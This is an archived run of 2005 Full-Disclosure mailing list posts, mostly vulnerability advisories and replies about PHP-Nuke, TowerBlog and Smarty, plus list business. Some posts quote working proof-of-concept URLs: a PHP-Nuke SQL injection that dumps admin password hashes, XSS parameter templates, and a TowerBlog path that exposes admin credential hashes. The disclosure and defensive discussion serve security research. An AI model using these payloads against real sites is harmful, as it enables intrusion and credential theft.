> 2.4
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkeditorial&ttitle=[XSS]
>
> 2.5
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkcomments&ttitle=[XSS]
>
> 2.6
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=ratelink&ttitle=[XSS]
>
> 2.7
> http://[HOST]/[DIR]/modules.php?name=Your_Account&op=userinfo&bypass=1&username=[XSS]
In general a multi-layered defense system is a good idea. mod_security is
a great tool for Apache which can be installed to catch certain kinds of
GET injections. Certainly not fool proof as the codebase should filter
inputs.
>
> - --- 3. Path Disclousure ---
>
On the topic of programming it is good practice to validate input,
however, for path disclosure, it is an even better plan to disable
displaying errors on a production website.
> - --- 4. How to fix ---
> Because phpnuke don't have security contact, you can download my patch from securityreason.com
> http://securityreason.com/patch/PhpNuke-7.6-adv.by.cXIb8O3.12-patch.tar.gz
>
Actually I know of a couple sites that work effortlessly to promote
security in php-nuke. These days chatserv works on writing and collecting
patches into a bundle for download:
nukecops.com
nukeresources.com
ravenphpscripts.com
I'd suggest posting your finds as news submissions to these sites, with
always a followup to phpnuke.org's Francisco (AKA nukelite).
--
Sincerely,
Paul Laudanski .. Computer Cops, LLC.
Microsoft MVP Windows-Security 2005
CastleCops(SM)... http://castlecops.com
CC Blog ......... http://blog.castlecops.com
Staff Blogs ..... http://busterbunny.castlecops.com
Our Vision ...... http://castlecops.com/postt63382.html
http://cuddlesnkisses.com http://justalittlepoke.com http://zhen-xjell.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Paul Laudanski (zxcastlecops.com)
Date: Sat Apr 09 2005 - 00:20:35 CDT
On 7 Apr 2005, Janek Vind wrote:
> http://localhost/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION
> %20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*
>
> ... and as result we can see md5 hashes of all the admin passwords in place, where normally
> top 10 votes can be seen :)
Again as before, code should be validating input. But as a simple
precaution against default GET attacks, changing the table prefix from the
common "nuke_" to something random like "zloqf7_" would render that
sample, and all others based on "nuke_" useless.
Of course in the grander scheme that isn't foolproof, but does work
against the default GETs.
--
Sincerely,
Paul Laudanski .. Computer Cops, LLC.
Microsoft MVP Windows-Security 2005
CastleCops(SM)... http://castlecops.com
CC Blog ......... http://blog.castlecops.com
Staff Blogs ..... http://busterbunny.castlecops.com
Our Vision ...... http://castlecops.com/postt63382.html
http://cuddlesnkisses.com http://justalittlepoke.com http://zhen-xjell.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Thierry Zoller (Thierrysniff-em.com)
Date: Sat Apr 09 2005 - 05:33:26 CDT
Guten Tag Jason,
[1]
J> It was once said that you could not realistically create two difference
J> sets of data that would cause a hash collision.
Correct, note that there has been as much (if not more) research in that field than in
the heap overflow sector.
[2]
J> It was once said that you could not exploit heap overflows and that
J> stack overflows did not allow for control of the machine.
Correct.
[3]
J> It was once thought that you could not use a format string to create an
J> exploitable condition.
Correct.
While these three statements are logical correct in themselves, there is no
necesite implication between those 3 sentences, which means they don't
proof your point. In other words, it is true statement[2] and [3] were made
and were proofen to be wrong, however that doesn't imply stament [1]
is wrong.
J> I see enough opportunities for motivated people to do the research and
J> create a solution that is not computationally prohibitive. I would not
J> be surprised if this happens in relatively short time.
"relatively short time"
Thats impossible because "relatively short time" has already
expired... hash functions (MD5) are not new..in other words .. timed out ;)
--
Thierry Zoller
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Randall M (randallmfidmail.com)
Date: Sat Apr 09 2005 - 08:10:30 CDT
I for one say this is a step in the right direction. Shows they want to work
with us.
Randall M
"If we ever forget that we're one nation under God, then we will be a nation
gone under."
- Ronald Reagan
_________________________________
:-----Original Message-----
:From: full-disclosure-bounceslists.grok.org.uk
:[mailto:full-disclosure-bounceslists.grok.org.uk] On Behalf
:Of Microsoft Security Response Center
:Sent: Friday, April 08, 2005 2:21 PM
:To: bugtraqsecurityfocus.com;
:ntbugtraqlistserv.ntbugtraq.com; full-disclosurelists.grok.org.uk
:Subject: [Full-disclosure] How to Report a Security
:Vulnerability toMicrosoft
:
:-----BEGIN PGP SIGNED MESSAGE-----
:Hash: SHA1
:
:Hello!
:
:The Microsoft Security Response Center investigates all
:reports of security vulnerabilities sent to us that affect
:Microsoft products.
:If you believe you have found a security vulnerability
:affecting a Microsoft product, we would like to work with you
:to investigate it.
:
:We are concerned that people might not know the best way to
:report security vulnerabilities to Microsoft. You can contact
:the Microsoft Security Response Center to report a
:vulnerability by emailing securemicrosoft.com directly, or
:you can submit your report via our web-based vulnerability
:reporting form located at:
:https://www.microsoft.com/technet/security/bulletin/alertus.aspx.
:
:Sincerely,
:Microsoft Security Response Center
:
:-----BEGIN PGP SIGNATURE-----
:Version: PGP 8.1
:
:iQIVAwUBQlbY4oreEgaqVbxmAQK5yhAAkm+H1/V69L5iLILNuSUSsgnd4Tw5Lzwj
:uyhigxfdJR9WYXSNg/7WCoMI77G6No8QvKOfkrXqbyv6SYcR5ZVDWYzeE3+jgje+
:AfqWT9r0du8Wj7q+Qby/j61OaezQkGoX/WRM+KV/RAhSVgXybcUMmdyeBNY9TiBg
:ixlCuE75VndS0vMwkf8rzGaW/YXzMveLEXKGyYhkkZEDZ+Q2NZeFwxsXUEfw8yCL
:nUYm6D9KAz5ekhRNtv22eoTXfTrXOfdziEAGGB1J6hKowEgeTaKcRPuTadz4A8YB
:gGzJPN3J6t1Au1IHRsgfnVou9INFtahHA5B1NbfKyHGLsoztYKqXxLo4u7Z/b2+a
:Vj8yiZNmaFD1IPzPnb4LS4RBZSgPMcwaB6pbXt7Y9n/g8VmrkqouDEdprHlMltoS
:JpqYpnTdZtsxaGg6wimaFv7CocdV4CKAuOpVdjvlezc6jUYLQ/H/LzgDFDekTXZv
:TNJ7qzRl4GFKt2fK7+7m60x3VukWNy3JGQSxgOX7mkftfglrHzyOL6AtDwhf2ff4
:uNVbWek9bTgpVvmmpxnFGu/h5hLp5/Hqe98lv2axlbEFLP1ZD00rNPPSLCxRY/xL
:8DGokeQT2Oc1HysO2jo7kpFjW4mCTTh9qK1lh0ju7gGQa66SMJ9woT2V6sSsOwpS
:LO3tKPf9GIQ=
:=kT17
:-----END PGP SIGNATURE-----
:_______________________________________________
:Full-Disclosure - We believe in it.
:Charter: http://lists.grok.org.uk/full-disclosure-charter.html
:Hosted and sponsored by Secunia - http://secunia.com/
:
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Honza Vlach (janusvolny.cz)
Date: Sat Apr 09 2005 - 09:02:15 CDT
The point is, that they don't check the hashes.
They send once a mail concerning file spider.tgz of size around 130kb
claiming it is Spiderman 2 movie.
And the path was like
/pub/linux/Slackware/10.0/ ... you get the idea.
So it's just a fuss worth nothing.
Just my $0.02
Honza Vlach
--
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GIT/CS d- s: a-- C++++$ ULS++++$ P L+++ E--- W- N+ o? K? w-->--- O?
M->+ V? PS PE Y++ PGP+++ !t 5? X++ R tv-- b++ DI+ D++ G+>+++ e h--- r++ y?
------END GEEK CODE BLOCK------
() ascii ribbon campaign - against html mail
/\ - against microsoft attachments
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.7 (GNU/Linux)
iD8DBQFCV+BnSVzvioqX7FkRAidCAJ98RTeSzP1eWoMsn0PZVJ9+QT4LMACfU5oh
B3czdc+Qvm3VHjWNQQc0FYA=
=AyQS
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Paul Laudanski (zxcastlecops.com)
Date: Sat Apr 09 2005 - 10:45:59 CDT
On 7 Apr 2005, Janek Vind wrote:
> http://localhost/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION
> %20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*
>
> ... and as result we can see md5 hashes of all the admin passwords in place, where normally
> top 10 votes can be seen :)
Again as before, code should be validating input. But as a simple
precaution against default GET attacks, changing the table prefix from the
common "nuke_" to something random like "zloqf7_" would render that
sample, and all others based on "nuke_" useless.
Of course in the grander scheme that isn't foolproof, but does work
against the default GETs.
--
Sincerely,
Paul Laudanski .. Computer Cops, LLC.
Microsoft MVP Windows-Security 2005
CastleCops(SM)... http://castlecops.com
CC Blog ......... http://blog.castlecops.com
Staff Blogs ..... http://busterbunny.castlecops.com
Our Vision ...... http://castlecops.com/postt63382.html
http://cuddlesnkisses.com http://justalittlepoke.com http://zhen-xjell.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Paul Laudanski (zxcastlecops.com)
Date: Sat Apr 09 2005 - 10:45:59 CDT
A cursory web search revealed...
On 4 Apr 2005, Maksymilian Arciemowicz wrote:
> - --- 1.Description --- PHP-Nuke is a Web Portal System, storytelling
[SNIP]
>
> - --- 2. XSS ---
> 2.0
> http://[HOST]/[DIR]/banners.php?op=EmailStats&name=sex&bid=[XSS]
>
> 2.1
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=TopRated&ratenum=[XSS]&ratetype=num
This has been a bug for over a year now:
http://www.waraxe.us/content-5.html
>
> 2.2
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=%3Ch1%3E50&ratetype=num
This too was pointed out nearly two years ago:
http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/1213.html
>
> 2.3
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkdetails&ttitle=[XSS]
>
> 2.4
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkeditorial&ttitle=[XSS]
>
> 2.5
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkcomments&ttitle=[XSS]
>
> 2.6
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=ratelink&ttitle=[XSS]
>
> 2.7
> http://[HOST]/[DIR]/modules.php?name=Your_Account&op=userinfo&bypass=1&username=[XSS]
In general a multi-layered defense system is a good idea. mod_security is
a great tool for Apache which can be installed to catch certain kinds of
GET injections. Certainly not fool proof as the codebase should filter
inputs.
>
> - --- 3. Path Disclousure ---
>
On the topic of programming it is good practice to validate input,
however, for path disclosure, it is an even better plan to disable
displaying errors on a production website.
> - --- 4. How to fix ---
> Because phpnuke don't have security contact, you can download my patch from securityreason.com
> http://securityreason.com/patch/PhpNuke-7.6-adv.by.cXIb8O3.12-patch.tar.gz
>
Actually I know of a couple sites that work effortlessly to promote
security in php-nuke. These days chatserv works on writing and collecting
patches into a bundle for download:
nukecops.com
nukeresources.com
ravenphpscripts.com
I'd suggest posting your finds as news submissions to these sites, with
always a followup to phpnuke.org's Francisco (AKA nukelite).
--
Sincerely,
Paul Laudanski .. Computer Cops, LLC.
Microsoft MVP Windows-Security 2005
CastleCops(SM)... http://castlecops.com
CC Blog ......... http://blog.castlecops.com
Staff Blogs ..... http://busterbunny.castlecops.com
Our Vision ...... http://castlecops.com/postt63382.html
http://cuddlesnkisses.com http://justalittlepoke.com http://zhen-xjell.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Mike Barushok (mikehomekcisp.net)
Date: Sat Apr 09 2005 - 16:31:01 CDT
On Fri, 8 Apr 2005, Astharot wrote:
> The graphical statistics for the year 2004 are finally ready! They also
> contains excerpts of the year 2002 amd 2003 when needed.
>
> There are two files
>
> a nice PDF document which can be downloaded here
>
> http://www.zone-h.org/download/file=5392/
Problem with graph in the document:
In the PDF document, on page 5, the same graph appears twice
with two different captions. The one labled 'Single defacements
by months', which is the lower one on the page, appears to be
inconsistent with graphs elsewhere in the document.
Problems with text in the document:
Pages 1 and 2 have many errors of spelling and of grammar,
throughout each paragraph and the index. The entire text
needs to be re-written or corrected by someone with better
English skills if a professional appearance is desired.
Problem with using the information complying with disclaimer:
Note on page 2 states no commercial purpose, and goes on to
allow students, journalists, and researchers to use except for
when 'direct or indirect profit is obtained'. Yet all students,
journalists and researchers expect direct or indirect profit.
Unless profit is explicitly defined to mean only monetary
renumeration directly for the product that cites the article,
because profit generally would include reputation, exchange
of work for progess towards completion of a degree, ability
perform any tranformation of data into information or to
benefit in any number of intangeable ways from the information.
The disclaimer overrides the Creative Commons Deed on Page 13:
The ordinary method a student, journalist, or researcher would
use the document is to cite only parts that are useful, or to
transform the information into a form that fits their intended
use. Those uses would be permitted were it not for the verbage
on Page 2. There are no rights allowed under the limits on Page 2
that extend what would be allowed by Creative Commons
license - 'Attribution-NonCommercial-NoDerivs',
on page 13.
View the full license at:
http://creativecommons.org/licenses/by-nc-nd/2.0/legalcode
As such, the license on Page 2 is more restrictive than what
you probably intended, and there appears to be no reason to
have the Note on page 2, unless you did not intend to release
with the Creative Commons license on Page 13.
>
> while the full set of data in txt format, ready to be imported in your
> spreadsheet can be downloaded here:
>
> http://www.zone-h.org/download/file=5393/
>
<snipped>
> Enjoy!
>
> SyS64738 - Roberto Preatoni
> astharot - Gerardo Di Giacomo
> www.zone-h.org
>
> Original article:
> - http://zone-h.org/en/news/read/id=4457/
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Sumy (sanandresgmail.com)
Date: Sat Apr 09 2005 - 17:53:41 CDT
What Is Click Fraud?
Click fraud, or click spamming, occurs when a person or program
accesses a URL with no intention of browsing the site, purchasing a
product or performing any other type of conversion action. That
definition may be hard to understand so we have put together some
examples of the types of click fraud that is occurring every day (and
may be occurring to you!) and how these fraudulent activities occur.
How Is Click Fraud Committed?
Paid to Click Jobs
"A growing number of housewives, college graduates, and even working
professionals across metropolitan cities are rushing to click paid
Internet ads to make $100 to $200 (up to Rs 9,000) per month," the
Times of India claims. This article was published in May of 2004 and
serves as a wakeup call to all online advertisers. These companies are
popping up all over and have many different ways to defraud PPC
advertisers. They pay people to search for certain keywords, click on
certain ads and even tell them to stay on each site a certain amount
of time so it doesn't look suspicious. They also even email ads to
employees to have them click. Why does this happen? For the reasons
above, competitors and affiliates hire these companies because they
are able to increase the cost to their competitors or increase their
own revenue through their advertising affiliate programs which ever
they choose.
Full FAQ
http://www.exploitx.com/forum/azbb.php?1113062913
Internet Fraud Articles:
http://www.exploitx.com/forum/azbb.php?Internet_Fraud
--
http://www.outwartips.net
http://www.exploitx.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: jkouns (jkounsopensecurityfoundation.org)
Date: Sun Apr 10 2005 - 01:37:35 CDT
OSVDB Recognized as 501(c)3 Non-Profit Organization
The Open Source Vulnerability Database, a project to catalog and
describe the world's security vulnerabilities, has continued to focus on
improving database content and increasing services offered to the
security community.
Since the official launch of OSVDB in March 2004, the vulnerability
database has grown from 1000 to over 6700 complete entries. This rapid
growth has far surpassed initial estimates, and the project’s many
successes show that the open source community can truly deliver
world-class security information.
OSVDB’s rapid success is directly attributed to the dedicated volunteers
who help populate, maintain and enhance the database. Their hard work
has already allowed OSVDB to exceed the amount of vulnerability
information available in some databases. At the current rate of growth,
the project is poised to surpass the other vulnerability databases by
the end of 2005. “It will soon become mandatory for security
professionals to use OSVDB if they want the most thorough information
available,” says Brian Martin, one of the project leaders.
The OSVDB leadership team has been aggressively working to ensure the
long term viability of the project. After improving content to be
recognized as an industry leader, the team determined that incorporating
as a non-profit organization was imperative to OSVDB’s future success.
Founded to formally run the OSVDB project, the Open Security Foundation
has been approved as a 501(c)3 non-profit organization under United
States law. Jake Kouns, OSVDB project lead, says, “Achieving our
non-profit status will allow us to seek funding and ensure free
vulnerability information will be available for years to come.”
Two of the OSVDB project leaders, Brian Martin and Jake Kouns, will be
presenting a talk called “Vulnerability Databases: Everything is
Vulnerable” at cansecwest/core05 (http://www.cansecwest.com/) in May
2005. The presentation aims to provide an unbiased review of
vulnerability databases, and addresses the value they should provide to
security practitioners.
###
More Information:
Jake Kouns
Open Source Vulnerability Database Project
+1.804.306.8412
jkounsosvdb.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Gerardo 'Astharot' Di Giacomo (astharotzone-h.org)
Date: Sun Apr 10 2005 - 07:41:50 CDT
Thanks for pointing out the mistakes, we corrected them. The duplicated
graph mistery solution was fairly simple: we used twice the data for
the massdefacement counted by month.
Now the single defacements counted by month graph is at its place.
The discrepancy in the licence has also been fixed. This is happening
when multiple hands are working on a single thing. Thanks for pointing
out it as well.
We also added a note( suggested by Jericho) to explain how mass
defacements and single defacements are counted.
About the english, we are working over it :) We are confident that in
just a couple of centuries we will be able to come out with
Gartner-like reports
Zone-H staff
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: John Cartwright (johncgrok.org.uk)
Date: Sun Apr 10 2005 - 09:19:01 CDT
[Full-Disclosure] Mailing List Charter
John Cartwright <johncgrok.org.uk>
- Introduction & Purpose -
This document serves as a charter for the [Full-Disclosure] mailing
list hosted at lists.grok.org.uk.
The list was created on 9th July 2002 by Len Rose, and is primarily
concerned with security issues and their discussion. The list is
administered by John Cartwright.
The Full-Disclosure list is hosted and sponsored by Secunia.
- Subscription Information -
Subscription/unsubscription may be performed via the HTTP interface
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.
Alternatively, commands may be emailed to
full-disclosure-requestlists.grok.org.uk, send the word 'help' in
either the message subject or body for details.
- Moderation & Management -
The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to
accept submissions from non-members based on individual merit and
relevance.
It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending
members may be removed from the list by the management.
An archive of postings is available at
http://lists.grok.org.uk/pipermail/full-disclosure/.
- Acceptable Content -
Any information pertaining to vulnerabilities is acceptable, for
instance announcement and discussion thereof, exploit techniques and
code, related tools and papers, and other useful information.
Gratuitous advertisement, product placement, or self-promotion is
forbidden. Disagreements, flames, arguments, and off-topic discussion
should be taken off-list wherever possible.
Humour is acceptable in moderation, providing it is inoffensive.
Politics should be avoided at all costs.
Members are reminded that due to the open nature of the list, they
should use discretion in executing any tools or code distributed via
this list.
- Posting Guidelines -
The primary language of this list is English. Members are expected to
maintain a reasonable standard of netiquette when posting to the list.
Quoting should not exceed that which is necessary to convey context,
this is especially relevant to members subscribed to the digested
version of the list.
The use of HTML is discouraged, but not forbidden. Signatures will
preferably be short and to the point, and those containing
'disclaimers' should be avoided where possible.
Attachments may be included if relevant or necessary (e.g. PGP or
S/MIME signatures, proof-of-concept code, etc) but must not be active
(in the case of a worm, for example) or malicious to the recipient.
Vacation messages should be carefully configured to avoid replying to
list postings. Offenders will be excluded from the mailing list until
the problem is corrected.
Members may post to the list by emailing
full-disclosurelists.grok.org.uk. Do not send subscription/
unsubscription mails to this address, use the -request address
mentioned above.
- Charter Additions/Changes -
The list charter will be published at
http://lists.grok.org.uk/full-disclosure-charter.html.
In addition, the charter will be posted monthly to the list by the
management.
Alterations will be made after consultation with list members and a
concensus has been reached.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Thierry Carrez (koongentoo.org)
Date: Sun Apr 10 2005 - 11:33:10 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [UPDATE] GLSA 200503-35:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Smarty: Template vulnerability
Date: March 30, 2005
Updated: April 09, 2005
Bugs: #86488
ID: 200503-35:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Update
======
New ways of bypassing Smarty's "Template security" were found and
fixed in Smarty. Users making use of that feature are encouraged
to upgrade to version 2.6.9.
The updated sections appear below.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-php/smarty < 2.6.9 >= 2.6.9
Description
===========
A vulnerability has been discovered within the regex_replace modifier
of the Smarty templates when allowing access to untrusted users.
Furthermore, it was possible to call functions from {if} statements and
{math} functions.
Resolution
==========
All Smarty users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-php/smarty-2.6.9"
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200503-35.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: CorryL (corrylsitoverde.com)
Date: Sun Apr 10 2005 - 11:36:50 CDT
-=[--------------------ADVISORY-------------------]=-
-=[
]=-
-=[ TowerBlog <= 0.6 ]=-
-=[
]=-
-=[ Author: CorryL x0n3-h4ck.org ]=-
-=[
]=-
-=[-----------------------------------------------------]=-
-=[+] Application: TowerBlog
-=[+] Version: 0.6
-=[+] Vendor's URL: http://tower.hybryd.org/?x=home
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: view admin account
-=[+] Exploitation: Remote/Local
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck
..::[ Descriprion ]::..
TowerBlog is, in short, a single user web-log (or web journal if you will)
content management system, aka CMS.
While there are many others out there
(MovableType and GreyMatter as linked amongst the others)
none quite filled my own personal needs and desires.
Mind you, this isn't meant to be an insult to the other CMS' out there,
I myself used both MovableType and GreyMatter extensively for some time,
however no system I could find was as powerful as I needed, nor as easily
expanded.
The only one that came close, was PHPNuke, but it was too bulky and bloated
for my needs.
..::[ Bug ]::..
this application and' he/she cuts to a type of bug that would allow to an
attacker
to come in possession of very precious information as user and admin pass.
This and' caused because' the data related to the admin acount are saved in
a text file,
that and' easily visible on the browser.
..::[ Proof Of Concept ]::..
http://host/path of blog/_dat/login
189bbbb00c5f1fb7fba9ad9285f193d1 << UserName Admin
81dc9bdb52d04dc20036dbd8313ed055 << Password Admin
the result I am the relative users and admin password in md5,
the first one corresponds to the user, the second to the password
..::[ Disclousure Timeline ]::..
[10/04/2005] - Vendor notification
[10/04/2005] - Vendor Response
[10/04/2005] - Public disclousure
CorryL
corryl80gmail.com
www.x0n3-h4ck.org
Italian Security Team
Fax (+39) 02700520894
Tel (+39) 06452215277
irc.xoned.net #x0n3-h4ck
_________________________________
www.seekstat.it is your web stat
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/